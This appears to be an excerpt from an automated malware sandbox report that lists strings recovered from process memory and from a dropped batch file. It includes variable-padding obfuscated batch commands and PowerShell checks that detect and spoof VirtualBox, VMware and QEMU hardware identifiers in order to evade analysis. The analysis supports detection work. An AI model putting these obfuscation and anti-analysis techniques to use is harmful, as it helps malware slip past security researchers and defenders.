Source: $rbx-CO2.bat.10.drBinary or memory string: %nCURpbZzgAnHhc%w%opgxmflGhpgmXsyRY%%MzNeIQEEgRTVTyrgZ%m%AzPtbVMCiOchIJ%%TvClkGpTHYuM%i%wHVQtSqzYs%%RrgIPCZjkGacPV%c%ZlFivHjBfATlOPs%%UddtSzHefZkCFvFfUE% %fTQXQIQahVqltSQf%%LBWzEBdwxGVJVOqkWnW%d%fnLczzjO%%QKOpFutHtAsNBtbUq%i%hZaxEUbUyQ%%aesoHGWhuqtXCDMDqE%s%JhinbONtfToKWCOs%%ZyTNeNWVNbyTSq%k%pEgLSQqAUnRngFx%%NkpESLgFulsoMp%d%mCCvrvcAFJYY%%nAQpqGKICMSEyB%r%HxcNFOEKDkg%%LKKUUMGrTucYgEQKQKR%i%ULThGktLIQnfjHZY%%RXRRjxmveGaXUUStnf%v%RCnJsVIdgXOzFRSYM%%aKnGMCDsNOVvMWCZhpD%e%zWAtfxphvf%%VftmuMkPLf% %hUhLkRWF%%CuyAejTBpmwXIMaps%g%hnXzSiyPGmtmyk%%vzBHTikSIAyJdyhhwS%e%PsNcBqbpD%%hcOlhnmyIyBWuoZu%t%vqyeXuqvxHxa%%SSHlByJyWlVJN% %FSXydgRFZeC%%HyPJFPyqFJo%M%NALazeDvj%%KCziuTznTD%o%rQlImFgkwNWDNL%%uRfUBhaGNmjwvER%d%PLBwJArnyxk%%nNZLxRyIiYbAqkxwc%e%LGFvhRmoT%%ASweWnsZnyZDfjkQKbf%l%cUkpMEhSGhzi%%DhpCXDdRyiEjhAwkqhl% %uSFHgssgz%%fYRFCbUoMxcHE%|%GgEeKIpaoZDLCIw%%lXsedFsBYvqcuNh% %oTbZNnwRdfKRcQz%%RhlfpzIaOdgo%f%nFASQwIHwRX%%AbXVAzhWdkmBbxP%i%alJhhzQzjZ%%uQFuqnEOyLfn%n%ZsoctYQsGxHli%%takxLAnMfyQWnxIrzU%d%fiOlOgkjSNsYjhxkO%%nuMqmmPmwLsK%s%YMncIEOwrAr%%YNAGOQnUdmzlOV%t%wBJzQiyulWfOF%%RWUvUnzoFIUfPlMmcnM%r%sUHaBnAs%%KJbHUmpFPUId% %VbFLsmIYT%%cDHWpTTHMgYVZSxVZw%/%mteZjYFvPUoKrQ%%ZemqaLWmVWjacNnxml%i%HxYExXJydNy%%HfhStIJvVqhica% %CHCxbyajtbAOsqnSy%%BBUVUTODQvrqPC%/%YhQBqwXHWNRT%%qfIxILAydHNIIxIERd%c%XrujwriaDU%%icaVnKMTHdbYUAcSHYo%:%eJFVCVWl%%zLXEfyKHNkX%"%YwiWszJtyAboSTyx%%trOBMhseuP%Q%skUOrkfn%%ZjwnSIYJILlamC%E%SjqmoPSXKHb%%GmXHOlafjVBJ%M%iJvIDbfH%%WiTTYHglMFQuswK%U%xOmxkXHH%%ffwogGWFfqP% %VmtYXiWSIQmLEgm%%kqZAlKTBKWFYUOngVp%H%CTymOLPzpTKJa%%dvOqoCksRobDX%A%UCgQpEKZMekPwkEIZ%%FFQtzPGNrjck%R%lNQFMNUuwJ%%IKfyfZOioO%D%shAdqjBmAXCTZbFFR%%fSiVNKOJhHruTVxnvJf%D%wKTjjfgQgxAuXm%%VOwuPoGcUUf%I%GwMGWziy%%YYMHEYDKhXxHN%S%yYoquQIZpdbAu%%QDUONOXPKNkqc%K%MXHwTVnHHjN%%LZJIFeDjTEcJTYEI%"%BfeNrmsvFG%%gjVLbfdXgchgMS% %iVYDUrEtgeJU%%NrmaxedKIrINV%/%CluYrUTexxbMiC%%PGrlIjOQhJIPNzDqQ%c%KbiMfrZAJUPYLWAVT%%qBmxNvmpJegEThlMx%:%GcBalhzUaiXLp%%FTZoMmnNzQHUufbHNY%"%aoQjqpeXTuer%%PnYahWZlmSDKsrNuTtu%D%noDOJJYIputuyKegg%%ARZnNvnyXY%A%CabJsKAKjqx%%rVSzimImGoRSDZZBiBl%D%ZqMtsLfZDwWKdSH%%UVfmpLLniigsL%Y%CIfLYajzhxgIJjshP%%rHGmwYwoFykjENnEU% %FrUHivOHfG%%BVbtvaespm%H%pJvKoXStv%%pdBxQKylxO%A%PmeCjPjMjlEcyckm%%gRPMlXmSzWEpFg%R%xnzxqhfhJGlTKbdu%%yZfGZhEpSKJTEwDe%D%ElDMVrbJffZdBQw%%YRFbmxfViywvofk%D%OYwRQTDIdXTcEl%%UnqFFYdAggIEw%I%GuaVspDtFLfoWXpE%%qWhChYzFJL%S%pLiogOxCThmW%%AIFzqbfkCcrHosywB%K%IDedUDRhiAM%%WeaubzsZoIGnNIQGR%"%ZgrREsIxObIi%%EyRgnHUqYdBbZXRqlM% %pMAFtfAIL%%LqrfPbOVCCZXfbd%/%PEuRgCpySgeSyaNZ%%MmMkVjWcvJj%c%sGzCCpVnTx%%bSnJWWwBPaO%:%OqGUuxOLTfn%%AEpWLRLpodKrHAa%"%ZhukDnKlW%%BQfMqWEMjsGzQ%W%ozeLGomTxILLLdWmT%%aqpVjCMOMU%D%IAzrvVeiZFI%%HsxaElBQWyC%S%zItpBYSBrCPh%%uphSeUysiICM%1%iCleujYaRNCOG%%NgPfDpOkVu%0%SDdhraQDZQpqnhFjl%%BEexSLlsCZwNXHQ%0%CFUSANLkG%%xQCYXgCHtPTv%T%rWYxRgmSIzgEZot%%OTTQIovPEb%2%kpnanhUDWBp%%eusPqwtYRjEFWZFddA%B%TQPcDvzSx%%LwAyZPvpze%0%lcybLHenBRz%%twdosOtRDVTgMd%A%XkjNEvOHN%%aSNuFWmlbhcVA%"%AfnPqiso%%BgcseVZEOqXrWGwY% %HVLWdcKgmyiZrEYMk%%oCEhpbCnFDME%>%RQrBwDKxesmS%%RFxLYFMu
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000003.2262721455.00000205FBEAD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002F.00000000.2338645845.000001C781E40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 0000001A.00000002.3608721089.00000205FBFA5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -48vmci
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0!hsVASNsaoExUOCVCfIBRpOoHUVuBIZuGmvQQakDOSOkwWDFTizmktCotdoFWsRsokRHtLfCVfNZBDSKrqBsiNjmJgxMMEGvawVlfVl! "J%yQvQpIocDcayfaVdbtehTzSDQUQfPHpIPrlfskSGDfmJZDroKAouTuQZXSauRjnWMsJNOQ%V%KQAyENmjDmCBvosVPuBmhAkxOuSqXGUEzTQxTuPcMOpNSqNYDQDomCIkGdKkVWlWrYbByV%O%cuEyAskwFxGTMgdGrXkFQQKFhPCswTomAIOiJNcpZkxmDbkfSKGeqSelKZqKQSZLjuserV%a%WDUVGGsxbgFxzLnjVIDCyKxrzhkMcjIfNXNcjvmxTnYkfssnxayKBPxmgCvzwFuRxAKBXk%h%ZAwfJkLmmgOWocKYEYABWGZNbnSgNEIQpnaYovfmBUqoKzrrgzVLbwosAJevsFzHyXGbcM%o%JjSoacqLcBWAZoJWPTYIyFqKTVuIQMTqpuPMTMwmbOGDyRFkYBiNctoeShueHIVqIGkFzW%R%ddwLGJYMlbqkJoEfnWgKTLrsFtTqVSHaLcyerrNEggWtNxYGMCtoyOcrLdgmPIRtuqyHPz%i%OWiBENPYFivmDtzsBWZhsnlAPxoDYxYqRnNxgXkpBNyXRDeyTcPBIIgALHMgymaijevqFc%Q%mDLJFFPnJlsQJWHwIjgmLykeQoNqNNhOSRPlQYcALxYANHDdANvljsqNtHTrRyzWeEYRgw%L%GKhGAoAKqjLJQarWEABcRifLImXcwiJLWdgLeDRbmIqJFiIzEhayqeEyEwXnqynizZNMUG%a%RbIzPiSvfAEyxoilvSyIgIFDLOvijGuVEYqYPRpvFjqwJRbZZoEUomzjveNbNKlzfIUzXk%c%vECccXrjUUNviVbAHsyhDLdoIVXRqbXBbPSZslkCRmkTosBqxFaBaQGKBougZASSWlutcb%w%hviWprAjaquHtKavBkihyeRdCrtrXcXhnvyEtdApkrneLsghSAJjkUDdEeuYXimXsmuYmv%o%cyKSXhQMrjllzwtNXsSuaoIBrbfqMzYiVwxlzrXvnRMkNMIPEEpbfSvOPiBWbAaSlcqdYi%F%oFvwhiBxOFsqMhjWccbJvrQauNRUZKwFQwqKGIKmmrtVDLNTIpancpMXOucurHydjNzqRz%D%ptsOweXUxIZXlJKiDBJtWmGqVFTqMQlxcjZGVoSIZTXtvtvOtajYGxDdNbSRkGiGwBVcKd%p%npIbtcpnVCkeWMGnREGWTTvbxsLqWTxteqNUpFeAOzfqGgKvZjKrvOjtTHDaqYqceRZGZM%N%YlAfhtOfuqIpqNjgXqgtaHbdjPjdlPhdwnlyRqGPFOnnsbIDSYUJAFLqkwWskKUEjFScBL%Y%oHKqOmuOLihFlmVxCRCVnutnEUTJdMiFbhJmYjRyVwLOlFzHILcbAGxUnwMTtLKYZBDeCI%C%ytadZRIFcZvmarJhfvJPZCxXfkLNOJcveZmJawHGlHtMxhLsoRwiuNIWVcYPfVRtXahaea%=m%INcDsiKAYztyWnTaqqqOYySBqQaPxZKnoKNuskqNkCZpMwUfdaQJO%p%lijVAnBiUcYOfklzzHgaCDvyCPTWUMwjbzcCEyRXPFqzbBGmIGEsJ%*%JmIMKsLtFniFPNGhJVaQjlWnWxbiGooiezsmuPTfgDjsiTlNafYLD%r%BAypvQnrCNqZZBqvtNTbUKFbEfdlniBpCFCYTXYZFODQTsisVsGse%e%JIRUxLqNbdulbwuYrBwOUwggPhlWKqVBilTWKdwmImEKjESWNtERk%*%EknCLfpztcKiScPCynnekfIRvXkppjrMdrEaGuZYhMpkTBrBctofq%s%MZyCvgNVZkjKYeAxOWenpWxQyYUGInVUlvrsgykomciCfzUxQdnwk%s%SbQBIexlhnLopzDNirqMPbmOVKYdwPEayJttBQxuMcePwnQarJIMX%*%KvQObGXfuPsILQFfjmrTVZNXxrHUYMNgSdNoDFzjApsnLgKxkUhwq%i%SbLHSrJZdgHblQIcqCENhtGGAlqGkJeEqQZbcHKnPkxiKlApcvUsC%*%JiyvehHacOtcdLvQGZJSqXXWyWoLbEOPLbGHBGYzdnMvdfHAezvvk%o%AmMlCXiSVZyaDqbeOpabjOckBSsoOGBjtFlPUvZJPHhoovAOFwqju%*%uaLjBKJETeoxpGYfljsqrlCGOWfsEIsqsOZEAFtKpfVCTRZPCJtmX%n%TdixevEFrZlMXeBHtEGQHbmpZNXXqPVoftzKQgvkOfXfKQVMyhieN%"
Source: $rbx-CO2.bat.10.drBinary or memory string: !vSVtsHijEsjvpxMOmAmzbHsRTCDfizfTtXiViBiYYvIuIXRhEXLGSZAOAezQecbenpbrpQFKroBGZXiWKvBkOyauxuvecsTVt! "V%BEiUjwptKYoUHUAlXSgqgkpGjKfMqbHwZqFXTlKjAKBktVDgfzYPkakqoCLy%h%rCcJqRVrpDrLhWPwJfnnhYGRdSmYfoIrzmSXHSTBamRChmInlOHjpyrsWlFy%t%FWlaUalVeSPRlLnUgdKRkZNqHybbVzbwmvVdaRIhaMisZQYDlwmSAOoGjVtv%b%YkZFQsEQPjUpvCQxQurQAyQzniVygpTfxmjPMDCGmhNbCWxYXRQODCUzuArI%X%xfKAqORitaKmSLEtKOWqLWBpzfBVrJvmlTigxnLNeoFWhDWSYBPFEbWADuak%p%nWRJFyaYCxVxdjlwrFiViIXQUPHkWICcmAzixVqIDXqAFrCuPAiYmfbEZbPP%N%QQbTUTkCJdYwozslrwkCmnuwzEQhyVjwfASNVwFMhaKMBMKNMQmCQnDCvFuq%q%dceOTCqNHEqVQyvmCIVMTcuIIHGSXpspbpIeVWTYvXgizrLsSqaNKIwaHvgm%H%WyPrmaTBPqqGPWqWWmiqVnZHpEFtSIwzPGcXhOVzxkDBZtYNrAdvnPrIyicH%g%uzJgTQQiTtOirISLKxHVGScrEbmaptyZMnfYAwIjCPUXLVdFWFYaBgaCxrBR%C%EQTAVPvdDUknPxsRXeGJYGdJvxxGmCAjUQEMVucVzZbbvKldNjEsKSTXMkey%c%sPRauatYTGVDcKkYFbnKluSdYiycXGZLpDDJibHurmkhnapaHUsLWumYXNcl%g%BqbmGkoyhBQDtStZkKQXSyucooOUrFLuYwTalXBcLQSgeOrdbnNmXetcWYYr%T%vthBPvFXZsNmjNlbFnYzXKTeRzxTcQemZjHsJrrIjteIzBckTrxIayuKAcKq%F%YLVjnBmagTsoWpqDGkEpwmaLtwlBOWSGGbJyyVvYocdaZiLLiRepyuULKkPR%Q%pLljbMHVFReKPGatjaLkKAtWRCimhYNofDJDQTYnAQfqNtzRtACKyFgOspsy%d%DvOHePFlWxDpbyKUvcjycqSGvdQAxUlBBAJebxmXOnVWXmIZVlspfTvnDhma%l%YfOblbNBPFSXQlKPvVJivRFlCWwIevBUllYJyTLVzhkpsvzTjGSHydFhzDzp%j%FfwteYMEnbqCkOJoGpShxCzyDTviGQjVtwptKQluIUGhqqxJtrAkLsRdGYPl%H%CEYwSuiOyqDQeyyCWrinvMOoqYjaEmMMbaReWjpVhJldNKfnUpgpPBPQPJgT%Q%lhjmDROeHuGMbmgMAKBFTVgpfxWzlaondwJZzYAWVbGAIunDvcqeiAZpbUgf%l%UpTGfsIEDgnBkEJRpGGLkteiKjfDwuYFSubGiZuqLIZpPOTDRiaunuVBkKWW%b%nfiihHJQCcJpmqaBtOtVpBMouErxyAvxcycGARhhedbOzKiXuuiwqaGLsTOD%G%plsbGlmOntbCGmRmAXPJvucesZhcRrnGcERSLZhnxuJatFPejukvefhVjnJG%K%ekWVguAcvZABPBlbKcLMkcSwgSBWxWJxpAjmxNUYfNJkTJFDTfkgCWwbsAPo%V%TDEzpdlprYEWhNGxtICwmYdsLCVteiUWYFfCikUQyqlUAnYPpZHJXsbUzmNN%I%hRkjeIYCIeojNMYWNjSxDgdeBlZFDkcWwhIGfcQRpwglLxVluehquqjbOgIS%q%JsYxbrMGdrRKsaigZStdpNlzcMCgYHSZuXiWyJjtLphdnwXticcWMEDVhzup%r%PGIvzSqvRlIqIZsZGhlGOiYVFVmPtnPZoUEeHLDufCCWtLoMmDpZnOAGIMQD%=)%BbDvJbNvnsUEQAlGbBTHzCQYPLAuXwUVaODBYBKKAqZlvvwnpaGkWVgZlFGXBtyRxYDc%;%XKHARjgiCFDupmeWPJYeIEqsUMihSiNwRuqEtgtNOXwFclIpoCbNazttuoFebZquRgDU%%WACJqkpKhKqJdTTpgZvraXkeBoMPGcNVIOsOZsxPjIlJXWbhgaoSKlTZpyibyzefWvap%$%AeqOBGhsLAgEnEJGNVkxUtyBkwqJEgNCVLHbKzqedBnPrDNUQyrakCuhGPDfpyOFMEJB%z%XIVoFfutfIkHJwTgPMrsqzuVVkPFNIcNTlXiCdveibbXFWwSEHQamqlxnZsuqPGxGwNx%X%zLDLqmkpywqZOWafScADazUCLbOtuErijYtTeeJZgVYQJsGuOBEEWjxZQbapyRUUfiPP%H%ChbNsBwfBeTsvtETZNlaBtcdduApaeLBDQRHzRmuMsyMhIUfmbVsWPnjeYKXbhewtsOE%y%CWtiBRnjUqVvAvcZjsEODICBgotFnbtPUpCpHNQeBdoOdpxFefnaNZbUtSbmyIWTWfBk%N%SMrwBznztOyRRNAiOtcUoIWPLEGThvRXOmNrNRynMCAFtjvKhOfDdGWjQCKXSurYXAdE%.%aiuWUOhMiqwBiWLtqnUhqDBlgAvskCISgRKZtiIoykbzgiPWIYHJGWowHjPutPCFIDvr%C%lMZhEFIgCbeYLyJlUYmkCorksoVJHvRCNxKWZzeaniTGeRIUfqLKrkOXuPPpKZyhjBkn%o%NNmuTmXtuLfBFbDrJglCJNCkKOpnKMwCGvgseqQenuDIJoJJvgxdqHEakcKfWJJIpCUk%p%UlmtqgpojTAweGSDotmZRghcGLiELVthtzPkTdMjsqQrBnaqRftVpUsOdkNFYKCoztcF%y%RHJkHdGBpQAsKRNFByRzgahJqgkHNCRiluzjviomnRznJuUgXXNbBDyQAaUATZONZsgq%"
Source: svchost.exe, 0000001A.00000003.2252800824.00000205FBA03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000000F.00000002.3611901630.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PointVMware&P
Source: svchost.exe, 0000001A.00000000.2251599001.00000205FBA12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: svchost.exe, 0000002F.00000002.3530307254.000001C781E5B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000014.00000003.2263746615.000001428A8D4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2213216986.000001428A8D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3602584883.000001428A8D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
Source: lsass.exe, 00000009.00000000.2134237170.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3525694016.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3530568510.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.2149953039.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.2218852747.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3526330854.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3516460450.000001CA97833000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.2221059381.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.2229065893.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3532761830.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.2246600077.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 0000002F.00000002.3530307254.000001C781E5B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmd.exe, 0000000D.00000003.2186067326.000001929143F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.2185864569.000001929143F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: svchost.exe, 00000014.00000002.3602287571.000001428A8AF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000000C.00000000.2153480969.00000195DD66A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000002F.00000000.2338595191.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000024.00000002.3520920288.000001B278E02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: $rbx-CO2.bat.10.drBinary or memory string: !hsVASNsaoExUOCVCfIBRpOoHUVuBIZuGmvQQakDOSOkwWDFTizmktCotdoFWsRsokRHtLfCVfNZBDSKrqBsiNjmJgxMMEGvawVlfVl! "J%yQvQpIocDcayfaVdbtehTzSDQUQfPHpIPrlfskSGDfmJZDroKAouTuQZXSauRjnWMsJNOQ%V%KQAyENmjDmCBvosVPuBmhAkxOuSqXGUEzTQxTuPcMOpNSqNYDQDomCIkGdKkVWlWrYbByV%O%cuEyAskwFxGTMgdGrXkFQQKFhPCswTomAIOiJNcpZkxmDbkfSKGeqSelKZqKQSZLjuserV%a%WDUVGGsxbgFxzLnjVIDCyKxrzhkMcjIfNXNcjvmxTnYkfssnxayKBPxmgCvzwFuRxAKBXk%h%ZAwfJkLmmgOWocKYEYABWGZNbnSgNEIQpnaYovfmBUqoKzrrgzVLbwosAJevsFzHyXGbcM%o%JjSoacqLcBWAZoJWPTYIyFqKTVuIQMTqpuPMTMwmbOGDyRFkYBiNctoeShueHIVqIGkFzW%R%ddwLGJYMlbqkJoEfnWgKTLrsFtTqVSHaLcyerrNEggWtNxYGMCtoyOcrLdgmPIRtuqyHPz%i%OWiBENPYFivmDtzsBWZhsnlAPxoDYxYqRnNxgXkpBNyXRDeyTcPBIIgALHMgymaijevqFc%Q%mDLJFFPnJlsQJWHwIjgmLykeQoNqNNhOSRPlQYcALxYANHDdANvljsqNtHTrRyzWeEYRgw%L%GKhGAoAKqjLJQarWEABcRifLImXcwiJLWdgLeDRbmIqJFiIzEhayqeEyEwXnqynizZNMUG%a%RbIzPiSvfAEyxoilvSyIgIFDLOvijGuVEYqYPRpvFjqwJRbZZoEUomzjveNbNKlzfIUzXk%c%vECccXrjUUNviVbAHsyhDLdoIVXRqbXBbPSZslkCRmkTosBqxFaBaQGKBougZASSWlutcb%w%hviWprAjaquHtKavBkihyeRdCrtrXcXhnvyEtdApkrneLsghSAJjkUDdEeuYXimXsmuYmv%o%cyKSXhQMrjllzwtNXsSuaoIBrbfqMzYiVwxlzrXvnRMkNMIPEEpbfSvOPiBWbAaSlcqdYi%F%oFvwhiBxOFsqMhjWccbJvrQauNRUZKwFQwqKGIKmmrtVDLNTIpancpMXOucurHydjNzqRz%D%ptsOweXUxIZXlJKiDBJtWmGqVFTqMQlxcjZGVoSIZTXtvtvOtajYGxDdNbSRkGiGwBVcKd%p%npIbtcpnVCkeWMGnREGWTTvbxsLqWTxteqNUpFeAOzfqGgKvZjKrvOjtTHDaqYqceRZGZM%N%YlAfhtOfuqIpqNjgXqgtaHbdjPjdlPhdwnlyRqGPFOnnsbIDSYUJAFLqkwWskKUEjFScBL%Y%oHKqOmuOLihFlmVxCRCVnutnEUTJdMiFbhJmYjRyVwLOlFzHILcbAGxUnwMTtLKYZBDeCI%C%ytadZRIFcZvmarJhfvJPZCxXfkLNOJcveZmJawHGlHtMxhLsoRwiuNIWVcYPfVRtXahaea%=m%INcDsiKAYztyWnTaqqqOYySBqQaPxZKnoKNuskqNkCZpMwUfdaQJO%p%lijVAnBiUcYOfklzzHgaCDvyCPTWUMwjbzcCEyRXPFqzbBGmIGEsJ%*%JmIMKsLtFniFPNGhJVaQjlWnWxbiGooiezsmuPTfgDjsiTlNafYLD%r%BAypvQnrCNqZZBqvtNTbUKFbEfdlniBpCFCYTXYZFODQTsisVsGse%e%JIRUxLqNbdulbwuYrBwOUwggPhlWKqVBilTWKdwmImEKjESWNtERk%*%EknCLfpztcKiScPCynnekfIRvXkppjrMdrEaGuZYhMpkTBrBctofq%s%MZyCvgNVZkjKYeAxOWenpWxQyYUGInVUlvrsgykomciCfzUxQdnwk%s%SbQBIexlhnLopzDNirqMPbmOVKYdwPEayJttBQxuMcePwnQarJIMX%*%KvQObGXfuPsILQFfjmrTVZNXxrHUYMNgSdNoDFzjApsnLgKxkUhwq%i%SbLHSrJZdgHblQIcqCENhtGGAlqGkJeEqQZbcHKnPkxiKlApcvUsC%*%JiyvehHacOtcdLvQGZJSqXXWyWoLbEOPLbGHBGYzdnMvdfHAezvvk%o%AmMlCXiSVZyaDqbeOpabjOckBSsoOGBjtFlPUvZJPHhoovAOFwqju%*%uaLjBKJETeoxpGYfljsqrlCGOWfsEIsqsOZEAFtKpfVCTRZPCJtmX%n%TdixevEFrZlMXeBHtEGQHbmpZNXXqPVoftzKQgvkOfXfKQVMyhieN%"
Source: svchost.exe, 0000002F.00000000.2338595191.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
